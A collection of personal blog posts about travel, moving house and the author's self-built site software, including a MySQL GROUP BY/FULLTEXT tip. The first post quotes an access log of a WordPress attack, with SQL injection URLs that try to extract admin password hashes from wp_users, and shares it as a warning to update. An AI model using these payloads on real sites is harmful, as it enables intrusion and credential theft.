For those a bit slow on the uptake of movie references, the title of this post is from Resident Evil 2... you know, the one filmed in Toronto ;-)

I just noticed a hack attempt on this site by someone assuming that I was running WordPress:

164.113.135.124 /wp-trackback.php?p=1 exploder
164.113.135.124 /wp-trackback.php?p=1 exploder
164.113.135.124 /wp-admin/admin-ajax.php? exploder
164.113.135.124 /wp-trackback.php?tb_id=1 exploder
164.113.135.124 http://www.danielquinn.org/xmlrpc.php exploder
164.113.135.124 http://www.danielquinn.org/?cat=%2527+UNION+SELECT+CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))+FROM+wp_users+where+id=1/* exploder
164.113.135.124 http://www.danielquinn.org/?cat=999+UNION+SELECT+null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* exploder
164.113.135.124 /wp-trackback.php?p=1 exploder
164.113.135.124 /wp-trackback.php?p=1 exploder
164.113.135.124 /wp-admin/admin-ajax.php? exploder
164.113.135.124 /wp-trackback.php?tb_id=1 exploder
164.113.135.124 http://danielquinn.org/xmlrpc.php exploder
164.113.135.124 http://danielquinn.org/?cat=%2527+UNION+SELECT+CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))+FROM+wp_users+where+id=1/* exploder
164.113.135.124 http://danielquinn.org/?cat=999+UNION+SELECT+null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* exploder

If you're running WordPress on your own servers, please update your software. It would appear that there's security holes in one of the older versions of which some less-than-noble people are aware.

Also, Python is cool. I just wanted to share that ;-)

For those of you who don't already know, I'm currently in Toronto for a few more days. Much has happened about which I'd like to blog, but the thing about vacation is that you're supposed to enjoy it first, and talk about it later ;-)

It should be noted though that part of my trip out East includes the retrieval of my server from Melanie's house, and that means that this site is going offline as of Saturday and won't be back up 'till I've figured everything out in BC and re-setup the whole thing. So yeah, if when you come back here, you find nothing, know that it's temporary :-)

Alright, back to the vacationing!

A while back, I added a new section to this site called Snapshots, the purpose of which is to have a sort of live-photoblogging feature for the site. If I see something neat, I snap it with my camera phone and upload the pics to my site. I don't know if anyone's checked it out yet though since Melanie recently asked: "has that always been there?"

Anyway, it's been there for a while and it can be neat to browse through when you have the time. Tonight however, I added an RSS component to it so people who use aggregators can get the pics as they happen.

I don't have comments enabled in there yet, so if you see something neat, or even if you're just looking at the pics, please post a comment here.

I've been rather busy since I left Venice writing code for this site. The changes are finished and (mostly) tested, so I'm releasing them now. Please let me know if you find anything broken eh?

Changes include:

• Imager comments
• Offsite-linking disabled (if a site tries to link to my images rather than copy them (thereby stealing bandwidth) they get a nasty message instead).
• Lots of bug fixes

I saw a great deal of Rome today and yesterday, but only have 25minutes here to write it all out... so I won't. I'll write it later and upload it even later than that. Just know that I walked through Piazza San Pietro (the square in front of the Vatican), saw the Pantheon, and the Coliseum briefly (my Dad and I will go for a more detailed visit later) and checked out the Protestant Cemetary (and cat sanctuary!) as well as Piazza Popoli. It's very pretty, but Rome, on the whole, is quite dirty. You should see the subway.

Alright, I'm rambling and I'm running out of time. I'll post in a couple days :-)

Oh right. I forgot to mention that I finished Harry Potter on my first night in Rome.

Pavel will appreciate this, but the rest of you might wanna read this anyway. I've added a single thing to my site that *should* fix the problem some of you have been running into when trying to post comments. For some reason, when some people tried to post a comment with a non-ASCII character in it (like curly quotes or non-English characters) the post would get truncated. I *think* I've fixt this by adding a charset definition to the HTTP headers. Apache will do this transparently when you add this to your VirtualHost.

AddDefaultCharset UTF-8

So, don't necessarily go about trying to break my site by posting fake comments, but if you post something and it doesn't come through exactly as you intended, please email me what you sent and I'll try to figure out what broke.

Oh, and I'm in Geneva today. So far, it sucks. The town is small, noisy, dirty and kinda ugly. No snow, not much in the way of mountains, just cold. I'll be going up to the UN headquarters today as well as the Red Cross museum though. That should be interesting :-)

Rather than post about fun European stuff, I thought that I would mention that I spent the 5hour train ride from Amsterdam to Berlin fixing stuff on my site. Namely, I've fixed the whole site (and my server as a result) to use UTC, (or GMT as the non-geek might call it) as well as allow each logged-in person to set a personal timezone.

This has the following effects:

• You'll have to log-in again. I had to delete the history of who was logged in, so your cookies are no longer valid. Just login and the site will remember you from now on as it did before.
• Times stated on the site (like on blog posts, comments and images) will be displayed in UTC unless (a) you're logged in, and (b) you've selected a timezone other than UTC. I've manually set all of your timezones to what I figured was local for you, so you may not need to do anything special.
• When commenting, your personal info will be pre-filled for you. You can change this stuff by going to the Preferences section above.

As with any big site change, there's bound to be stuff I've missed. If you see something, please let me know about it and I'll fix it as soon as I can.

You may have noticed that my site went away today (some of you did and even txt-messaged me about it -- thank you!). This will probably be a common thing for the next couple months due in part to the fact that my site is hosted at Melanie's house on a pseudo-static IP and a flakey router.

Under the circumstances, it's really the best setup I can get and I'm really appreciative of Melanie for tolerating the presence of my server stuff in her place for the next few months so I can blog from Europe and post pictures etc. Just remember that since I'm not around to watch to see if Rogers changes my IP (as it did today), I can't fix things right away. There may be some downtime and delays if stuff blows up and I'm offline for a few days. Don't worry. I'm not dead, just offline :-)

When I get back home, I'll have to look into good ISPs in Vancouver. Any suggestions would be welcome.

I ran into something interesting this morning while trying to patch some bugs in my blogger that I thought I should share. In short, you shouldn't use GROUP BY statements in a VIEW if you intend to benefit from any indexes on the original columns. Basically, the GROUP BY nullifies the index.

To explain further, I'll include the example I was working on here.

I have a caching table called c_blog that's populated by a more complex query on blog post creation or comments. That table has the following structure:

CREATE TABLE c_blog (
    id INT UNSIGNED NOT NULL,
    title VARCHAR(255),
    content MEDIUMTEXT,
    music VARCHAR(255),
    created DATETIME,
    modified DATETIME,
    comments INT UNSIGNED NOT NULL,
    private BOOL,
    worksafe BOOL,
    favourite BOOL,
    allowComments BOOL,
    UNIQUE(id),
    FULLTEXT(title,content),
    KEY(created),
    KEY(private),
    KEY(worksafe),
    KEY(favourite),
    KEY(allowComments)
);

Note the FULLTEXT index on title and content. I use this in my search section to get sorted results based on relavence.

However, security is handled by means of a view. I find out what kind of user you are, and select the appropriate view to use so the right people see the right stuff. However, the v_blog_private view looked like this:

CREATE OR REPLACE VIEW `v_blog_private` AS
SELECT
    v.id,
    v.created,
    v.modified,
    v.content,
    v.title,
    v.music,
    v.comments,
    v.private,
    v.worksafe,
    v.favourite,
    v.allowComments,
    l.user
FROM
    v_blog v
LEFT JOIN
    blog_lkp_blogUser l ON l.blog = v.id
GROUP BY
    v.id;

And running that view in my search section blew up with the following error:

Can't find FULLTEXT index matching the column list

Now, clearly, the FULLTEXT index was there. The problem comes with the fact that the GROUP BY statement in the view was generating a completely different result set that was in itself not indexed.

The solution was simple enough, just move the GROUP BY out of the view and into the actual query calling the view. But the problem confused me enough that I figured I should post it here for others to find.

I've installed some simple code to rotate the header above so now the site should be a little prettier. More prettiness coming... as soon as I figure out how to make stuff pretty :-)

About 5years ago, two strange men came to my house, gave me a piece of paper and walked off with all of my worldly possessions. Yesterday morning, it happened again.

I'm officially bedless. The movers showed up yesterday, picked up nearly everything I had and loaded it into a tiny corner of their truck (I don't have much stuff). In exchange, I received a little piece of paper with a couple signatures and a promise that it'll arrive in Kelowna in "about ten days". From now until sometime late in November, I'll be living out of my backpack -- a prospect that's both kinda scary and exciting.

Melanie has offered to put me up 'till I leave, so I'll be sleeping there 'till I head to Europe. She's also playing host to my noisy server for which I'm very greatful as it hosts this site, my email and will be the staging area for image uploads while I'm shooting on my trip.

On an unrelated note, I believe I've patched my site to compensate for Internet Exploder's shortcomings as well as a hole I found in my commenter that failed to moderate posts. So if you see any new problems with the layout, or have trouble commenting, please let me know.